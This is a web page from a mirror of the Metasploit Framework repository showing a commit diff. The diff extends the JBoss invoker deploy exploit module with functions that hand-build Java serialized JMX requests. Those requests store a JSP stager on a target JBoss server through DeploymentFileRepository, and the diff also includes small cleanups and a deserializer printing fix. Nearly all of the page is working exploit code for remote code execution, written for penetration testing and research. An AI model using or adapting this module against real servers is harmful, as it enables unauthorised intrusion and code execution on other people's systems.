infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Install instaget with Rex::Java::Serialization

bug/bundler_fix
jvazquez-r7 2015-01-22 16:54:49 -06:00
parent 20d7fe631e
commit 37bf66b994
2 changed files with 143 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

151
modules/exploits/multi/http/jboss_invoke_deploy.rb
View File

@ -113,9 +113,9 @@ class Metasploit4 < Msf::Exploit::Remote
def exploit
mytarget = target
if (target.name =~ /Automatic/)
if target.name =~ /Automatic/
mytarget = auto_target
fail_with("Unable to automatically select a target") if not mytarget
fail_with("Unable to automatically select a target") unless mytarget
print_status("Automatically selected target: \"#{mytarget.name}\"")
else
print_status("Using manually select target: \"#{mytarget.name}\"")
@ -241,6 +241,12 @@ EOT
data = build_get_os.encode
when 'osarch.bin'
data = build_get_arch.encode
when 'installstager.bin'
data = build_install_stager(
war_name: replace_params['regex_app_base'],
jsp_name: replace_params['regex_jsp_name'],
data: replace_params["A" * 810]
).encode
else
path = File.join( Msf::Config.data_directory, "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)
data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }
@ -259,7 +265,7 @@ EOT
}, 25)
if (not res) or (res.code != 200)
unless res && res.code == 200
print_error("Failed: Error requesting preserialized request #{file_name}")
return nil
end
@ -393,14 +399,14 @@ EOT
object_array = builder.new_array(
values_type: 'java.lang.Object;',
values: [
builder.new_object(
name: 'javax.management.ObjectName',
serial: 0xf03a71beb6d15cf,
flags: 3,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
),
Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
],
builder.new_object(
name: 'javax.management.ObjectName',
serial: 0xf03a71beb6d15cf,
flags: 3,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
),
Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
],
name: '[Ljava.lang.Object;',
serial: 0x90ce589f1073296c,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
@ -443,6 +449,76 @@ EOT
build_invocation(stream)
end
def build_install_stager(opts = {})
war_name = "#{opts[:war_name]}.war"
jsp_name = opts[:jsp_name] || ''
extension = opts[:extension] || '.jsp'
data = opts[:data] || ''
builder = Rex::Java::Serialization::Builder.new
object_array = builder.new_array(
values_type: 'java.lang.Object;',
values: [
builder.new_object(
name: 'javax.management.ObjectName',
serial: 0xf03a71beb6d15cf,
flags: 3,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
),
Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository'),
Rex::Java::Serialization::Model::EndBlockData.new,
Rex::Java::Serialization::Model::Utf.new(nil, 'store')
],
name: '[Ljava.lang.Object;',
serial: 0x90ce589f1073296c,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
values_array = builder.new_array(
values_type: 'java.lang.Object;',
values: [
Rex::Java::Serialization::Model::Utf.new(nil, war_name),
Rex::Java::Serialization::Model::Utf.new(nil, jsp_name),
Rex::Java::Serialization::Model::Utf.new(nil, extension),
Rex::Java::Serialization::Model::Utf.new(nil, data),
builder.new_object(
name: 'java.lang.Boolean',
serial: 0xcd207280d59cfaee,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
fields: [['boolean', 'value', '[B']],
data: [['boolean', 0]]
)
],
name: '[Ljava.lang.Object;',
serial: 0x90ce589f1073296c,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
types_array = builder.new_array(
values_type: 'java.lang.String;',
values: [
Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
Rex::Java::Serialization::Model::Utf.new(nil, 'boolean')
],
name: '[Ljava.lang.String;',
serial: 0xadd256e7e91d7b47,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object_array
stream.contents << values_array
stream.contents << types_array
build_invocation_deploy(stream)
end
def build_invocation(stream_argument)
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
@ -480,6 +556,53 @@ EOT
stream
end
def build_invocation_deploy(stream_argument)
builder = Rex::Java::Serialization::Builder.new
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
null_stream = build_null_stream
null_stream_enc = null_stream.encode
null_stream_value = [null_stream_enc.length].pack('N')
null_stream_value << null_stream_enc
null_stream_value << "\xfb\x57\xa7\xaa"
stream_argument_enc = stream_argument.encode
stream_argument_value = [stream_argument_enc.length].pack('N')
stream_argument_value << stream_argument_enc
stream_argument_value << "\x7b\x87\xa0\xfb"
stream.contents << build_marshalled_invocation
stream.contents << Rex::Java::Serialization::Model::NullReference.new
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x78\x94\x98\x47\xc1\xd0\x53\x87")
stream.contents << build_integer(647347722)
stream.contents << build_marshalled_value
stream.contents << Rex::Java::Serialization::Model::BlockDataLong.new(nil, stream_argument_value)
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x01")
stream.contents << build_invocation_key(5)
stream.contents << build_marshalled_value
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x03")
stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'JMX_OBJECT_NAME')
stream.contents << builder.new_object(
name: 'javax.management.ObjectName',
serial: 0xf03a71beb6d15cf,
flags: 3,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository')
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << build_invocation_key(4)
stream.contents << build_invocation_type(1)
stream.contents << build_invocation_key(10)
stream.contents << Rex::Java::Serialization::Model::NullReference.new
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream
end
def build_marshalled_invocation
builder = Rex::Java::Serialization::Builder.new
builder.new_object(
@ -510,7 +633,7 @@ EOT
['int', 'ordinal']
],
data:[
['int', ordinal],
['int', ordinal]
]
)
end
@ -525,7 +648,7 @@ EOT
['int', 'ordinal']
],
data:[
['int', ordinal],
['int', ordinal]
]
)
end
@ -545,7 +668,7 @@ EOT
['int', 'value']
],
data:[
['int', value],
['int', value]
]
)
end

8
tools/java_deserializer.rb
View File

@ -121,8 +121,12 @@ class JavaDeserializer
# @param [Fixnum] level the indentation level when printing super classes
def print_array(arr, level = 0)
prefix = " " * level
puts "#{prefix}Array Description"
print_class(arr.array_description.description, 1)
if arr.array_description.description.class == Rex::Java::Serialization::Model::NewClassDesc
puts "#{prefix}Array Description"
print_class(arr.array_description.description, 1)
else
puts "#{prefix}Array Description: #{arr.array_description.description}"
end
puts "#{prefix}Array Type: #{arr.type}"
puts "#{prefix}Array Values ##{arr.values.length}"
arr.values.each do |v|